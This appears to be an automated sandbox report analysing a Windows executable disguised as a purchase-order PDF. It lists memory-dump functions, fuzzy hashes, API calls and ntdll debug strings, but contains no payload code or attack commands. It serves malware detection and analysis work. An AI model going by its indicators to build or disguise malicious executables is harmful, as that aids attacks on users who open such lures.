Opcode Fuzzy Hash: af533711b1627b9e13edd3984579a133bc19894de5b5c096426f0be94914e9e8
Instruction Fuzzy Hash: 6A410874E142198FDB18CFAAD980AAEB7F2FB89300F10C0A9D409A7264DB309E419F51

Function 00BA92F1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341aeb9f94e1664bb166e20841e36df81d9385206f43a46f36d8ff1daf2f4e4c
Instruction ID: ab7f251ad939fa75afe66d30595b215c8b786fad7acd2c89ede97c208222c37f
Opcode Fuzzy Hash: 341aeb9f94e1664bb166e20841e36df81d9385206f43a46f36d8ff1daf2f4e4c
Instruction Fuzzy Hash: BD412C74E152198FDB19CF6AD980AAEBBF2AF89300F14C4AAD409A7265DB309D41DF11

Function 0251E469 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3d0909335e209c477cf920493be928c96f56bb13b84086abcac70877c21718
Instruction ID: 5ad03b76d3bf791c73fec979b113f3ecf02f4fb8e34c08425dd2d08d3cd14f01
Opcode Fuzzy Hash: de3d0909335e209c477cf920493be928c96f56bb13b84086abcac70877c21718
Instruction Fuzzy Hash: 3731AAB9D012089FCB10CFA9D984ADEFBF5BB49310F24902AE819B7310D334A945CF99

Function 0251AFF4 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079112530.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b325e0ae317c97177262efa1f83593694fdef35ef09f87f2ff4d173156f1ad
Instruction ID: 189ab2484b118ce22e17958fda945d1a09bf0799a763f16389fe6ab25ee369b2
Opcode Fuzzy Hash: d4b325e0ae317c97177262efa1f83593694fdef35ef09f87f2ff4d173156f1ad
Instruction Fuzzy Hash: 8A31AAB8D052489FDB10CFA9D984ADEFBF1BB49310F24942AE809B7310D374A945CF98

Function 00BA08D0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2076541249.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0febcdd86d653ac580d5960ea8210574e70f2acc9c8970d8ef8bbcf7a2ff318
Instruction ID: 3dc1ac29f21d2f73736ee31da5b87649cb79eb00e3d571abd04469a867d13249
Opcode Fuzzy Hash: e0febcdd86d653ac580d5960ea8210574e70f2acc9c8970d8ef8bbcf7a2ff318
Instruction Fuzzy Hash: 8E31E671E056188FEB58CFABD8507DEBBF3BBC9300F14C1AAD408A6265EB344A458F51

Analysis Process: PO-000172483 pdf.exePID: 5488, Parent PID: 5980COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.5%
Signature Coverage:	3.1%
Total number of Nodes:	127
Total number of Limit Nodes:	8

Executed Functions

Function 00417EB3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F25

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction ID: 74b1a67ad7a1e6c5496c2b823323dd79b328b320fcbdb6ab911308b9a49c7e9b
Opcode Fuzzy Hash: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction Fuzzy Hash: 65011EB5E4020DABDF10DAA5DC42FDEB3B8AB54308F0041AAED0897241F675EB598B95

Function 0042CCC3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCF7

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction ID: 7dd1565d8f3dbc3bc04d904a055674cb4cb7d7fe92152ebc39fafefd714ea547
Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction Fuzzy Hash: A8E04F316006147BE610AA6ADC41FD7776CDFC5714F408419FA08A7181C670B91187F4

Function 01782B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01782B6A

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ed8772105fb20d083fe97c8017bf6e9cbcf9a3a84517fd12be7e5c30765f57e
Instruction ID: ecdb6b370afeafb0801307a57eef3f60e37e5230f5b890ff9ee935fe9a80fbfd
Opcode Fuzzy Hash: 6ed8772105fb20d083fe97c8017bf6e9cbcf9a3a84517fd12be7e5c30765f57e
Instruction Fuzzy Hash: 9F90026120640403470571585414616800AD7E1201B55C031E10185A0DC5298A95622A

Function 01782DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01782DFA

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e102bc5525beb1d1e15b7fb6ccb22dcb98539c84f5c74b88a39b1fbf9af3c7b
Instruction ID: 7bb4f843359d9517bb77d82e2971e1c70ca7a9e562fa9e2b5439c71dd8c51d3e
Opcode Fuzzy Hash: 4e102bc5525beb1d1e15b7fb6ccb22dcb98539c84f5c74b88a39b1fbf9af3c7b
Instruction Fuzzy Hash: 7690023120540813D711715855047074009D7D1241F95C422A0428568DD65A8B56A226

Function 01782C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01782C7A

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2405042da97dfc7417c63e158272c23babe33ffa5c549cfa80a4cd597f6236c
Instruction ID: c7e810920db7b22d36f3e749b700eaa435afa62f2d31239a636f206723873a69
Opcode Fuzzy Hash: c2405042da97dfc7417c63e158272c23babe33ffa5c549cfa80a4cd597f6236c
Instruction Fuzzy Hash: 6590023120548C02D7107158940474A4005D7D1301F59C421A4428668DC6998A957226

Function 017835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017835CA

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e759c09343139dcfd884a633049ec792fd0ec4aaf8cf8f8ac7b553758ddc0a88
Instruction ID: 05f944bc4c31f0789405918d9806e0ece92981f8610388f1813f724144ec0298
Opcode Fuzzy Hash: e759c09343139dcfd884a633049ec792fd0ec4aaf8cf8f8ac7b553758ddc0a88
Instruction Fuzzy Hash: 4790023160950802D700715855147065005D7D1201F65C421A0428578DC7998B5566A7

Function 004146F5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
Instruction ID: 9cf80268f77044ef790c1c2abc85dc15f1fb4f0f00327b47cd463f739ad630b0
Opcode Fuzzy Hash: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
Instruction Fuzzy Hash: C711C6B1E4431876EB11AB91DC02FDF7B789F41714F018059FE147B281D3B89A0687E9

Function 00414703 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
Instruction ID: d188dead4f36383fb44ff5ed79d53b29f72580d310d15dc5f7dee60383c7666d
Opcode Fuzzy Hash: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
Instruction Fuzzy Hash: E001C871E4021876DB11A7919C02FDF7B7C9F41714F008059FF147B2C1D6B85A0687A9

Function 004146B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
Instruction ID: a2084ebda050bdff8e3395dbdaee04fa0238bf01014c37db4853ee82cf069130
Opcode Fuzzy Hash: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
Instruction Fuzzy Hash: 6D014CB1D4530475E72197A0AC02FEF7B689F82724F00419AFE20BB2C5C6785A4187AD

Function 0042D023 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,00417735,000000F4), ref: 0042D062

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction ID: b1f67ff1680508f6b48a13b8e8d45400879f8c202f5ac700e6df5a6440d7a715
Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction Fuzzy Hash: B9E06D72604204BBD610EE59EC41F9B77ACDFC5714F004419FA08AB242D770B91086B8

Function 0042CFD3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EC5B,?,?,00000000,?,0041EC5B,?,?,?), ref: 0042D00F

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction ID: 7b03c5464cd71f7b56b57a232ca469f330cc0886600393034a38dfef118b4b2f
Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction Fuzzy Hash: 9AE09AB6700208BBD610EE59EC41F9B77ACEFC9710F004419FE09AB242D670B9108BB8

Function 0042D073 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,220AB2FE,?,?,220AB2FE), ref: 0042D0AA

Memory Dump Source

Source File: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PO-000172483 pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
Instruction ID: 46dd625dd64cb4bfb7d8af5c768814de95ff13fe0ff90786c18fe221300a3b06
Opcode Fuzzy Hash: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
Instruction Fuzzy Hash: 07E04F322002147BD510AA5ADC41FDBB7ACDBC5710F014419FA08A7182DAB0BA0187E4

Function 01782C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01782C24

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c949fc0927d6791b8f2170e1faba2c8deba71d131caf3aafe551f1613c2889d
Instruction ID: 634241c21ad81e8897d228c8df33503c42f3411cfb8e2f55712fa593e1f2d1ac
Opcode Fuzzy Hash: 9c949fc0927d6791b8f2170e1faba2c8deba71d131caf3aafe551f1613c2889d
Instruction Fuzzy Hash: 1DB09B719455C5C5DF11F7645608717B900B7D1701F15C071D2034655F473CC1D5E276

Non-executed Functions

Function 017F8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017F8E3F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017F8FEF
*** Resource timeout (%p) in %ws:%s, xrefs: 017F8E02
<unknown>, xrefs: 017F8D2E, 017F8D81, 017F8E00, 017F8E49, 017F8EC7, 017F8F3E
read from, xrefs: 017F8F5D, 017F8F62
The resource is owned exclusively by thread %p, xrefs: 017F8E24
*** An Access Violation occurred in %ws:%s, xrefs: 017F8F3F
Go determine why that thread has not released the critical section., xrefs: 017F8E75
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017F8F2D
The instruction at %p referenced memory at %p., xrefs: 017F8EE2
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017F8D8C
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017F8DB5
The resource is owned shared by %d threads, xrefs: 017F8E2E
*** enter .cxr %p for the context, xrefs: 017F8FBD
*** Inpage error in %ws:%s, xrefs: 017F8EC8
The critical section is owned by thread %p., xrefs: 017F8E69
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 017F8E4B
The instruction at %p tried to %s , xrefs: 017F8F66
*** then kb to get the faulting stack, xrefs: 017F8FCC
This failed because of error %Ix., xrefs: 017F8EF6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017F8DC4
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017F8E86
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017F8F26
a NULL pointer, xrefs: 017F8F90
*** enter .exr %p for the exception record, xrefs: 017F8FA1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017F8F34
an invalid address, %p, xrefs: 017F8F7F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017F8DD3
write to, xrefs: 017F8F56
*** A stack buffer overrun occurred in %ws:%s, xrefs: 017F8DA3

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 7e9283f4da5f9b2496f04cf973bfa00f41d94f9ac10b155d1c16e519359f4e9b
Instruction ID: 8e9a0980efc962816b995a21957d09f1b1ad2969d15255a6b71967cdc41515a1
Opcode Fuzzy Hash: 7e9283f4da5f9b2496f04cf973bfa00f41d94f9ac10b155d1c16e519359f4e9b
Instruction Fuzzy Hash: 1C81F3B9A44211BFDB259B19CC59D6BFF76EF9AB10F05008CF3086F252E3768541CA62

Function 017C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxDeadActivationContexts, xrefs: 017C2D82
UnloadEventTraceDepth, xrefs: 017C24C0
TracingFlags, xrefs: 017C2549
LdrpInitializeExecutionOptions, xrefs: 017C317D
FrontEndHeapDebugOptions, xrefs: 017C2489
GlobalFlag2, xrefs: 017C2FC0
minkernel\ntdll\ldrinit.c, xrefs: 017C3187
DisableHeapLookaside, xrefs: 017C246D
@, xrefs: 017C2B74
MinimumStackCommitInBytes, xrefs: 017C2BB0
UseImpersonatedDeviceMap, xrefs: 017C251C
ShutdownFlags, xrefs: 017C24A1
@, xrefs: 017C2942
ExecuteOptions, xrefs: 017C25A0
DisableExceptionChainValidation, xrefs: 017C275F
CFGOptions, xrefs: 017C2967
MaxLoaderThreads, xrefs: 017C24EC
GlobalFlag, xrefs: 017C2F3F, 017C3059
RaiseExceptionOnPossibleDeadlock, xrefs: 017C2579
Initializing the application verifier package failed with status 0x%08lx, xrefs: 017C3176

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 45559aa6278f4d67b724e37fec51e27a1da0a2d340f375f4234dc7a1ae120491
Instruction ID: 789a31a7c114540d67bbb38c262b6531863e0435137d36966820a9c58a739907
Opcode Fuzzy Hash: 45559aa6278f4d67b724e37fec51e27a1da0a2d340f375f4234dc7a1ae120491
Instruction Fuzzy Hash: AA929071608742AFE721DF28C884B6BF7E8BB84B54F04492DFA94D7252D770E944CB92

Function 01778620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 017B541F, 017B552E
Thread identifier, xrefs: 017B553A
corrupted critical section, xrefs: 017B54C2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017B540A, 017B5496, 017B5519
8, xrefs: 017B52E3
double initialized or corrupted critical section, xrefs: 017B5508
Critical section address, xrefs: 017B5425, 017B54BC, 017B5534
undeleted critical section in freed memory, xrefs: 017B542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017B54E2
Critical section address., xrefs: 017B5502
Invalid debug info address of this critical section, xrefs: 017B54B6
Thread is in a state in which it cannot own a critical section, xrefs: 017B5543
Address of the debug info found in the active list., xrefs: 017B54AE, 017B54FA
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017B54CE

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 8da9ac9b706da43d62a463ff71f049667a461b220660f7904b3521a2f73156db
Instruction ID: 2376b9d1e1babfefa90b04ff9edd3d5518247f9609d671a918900a53c6add05b
Opcode Fuzzy Hash: 8da9ac9b706da43d62a463ff71f049667a461b220660f7904b3521a2f73156db
Instruction Fuzzy Hash: 3781ABB0A01358EFEB20CF99C888BAEFBF5BB48714F244159F504B7251D375A941CB51

Function 017729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 017B259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017B22E4
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017B24C0
RtlpResolveAssemblyStorageMapEntry, xrefs: 017B261F
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017B2506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017B2409
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017B2412
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017B2624
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017B2602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017B25EB
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017B2498

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: c327a942bdecde2e5a01fbc5b2d0a3f854016601bdd6ecaea38abc18f5952827
Instruction ID: 804a82dc012f0dd9fa5acecdc8c9649d141d51f91aac906963dbd95575c90162
Opcode Fuzzy Hash: c327a942bdecde2e5a01fbc5b2d0a3f854016601bdd6ecaea38abc18f5952827
Instruction Fuzzy Hash: AA027EF1D012299BDB21DB54CC84BEAF7B8AF54704F0041DAE649A7242EB70AF84CF59

Function 017E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 017E8BA1
csrss.exe, xrefs: 017E8B80
runtimebroker.exe, xrefs: 017E8B73
smss.exe, xrefs: 017E8B8B
services.exe, xrefs: 017E8B96
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 017E8BD0
heapType, xrefs: 017E8BCB
DefaultBrowser_NOPUBLISHERID, xrefs: 017E8D00
SegmentHeap, xrefs: 017E8BE9
svchost.exe, xrefs: 017E8B68

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 5b680dfa290f1d6d6839983cb29669582debd3d3134548107c9eb06bab40e487
Instruction ID: e8d4a15cb94f8f182a417b07686c61a5da2664064f50e04bcfc4e9ce29b6a233
Opcode Fuzzy Hash: 5b680dfa290f1d6d6839983cb29669582debd3d3134548107c9eb06bab40e487
Instruction Fuzzy Hash: 5251CEB15083019BC729DF2C8848BABFBE8EF9D640F14496DE999C3254E770D648CB93

Function 017F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017F06EA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017F04D3
About to reallocate block at %p to %Ix bytes, xrefs: 017F03BA
HEAP: , xrefs: 017F03A6, 017F04B5, 017F05DD, 017F0682, 017F06D9
RtlReAllocateHeap, xrefs: 017F02BF, 017F0362
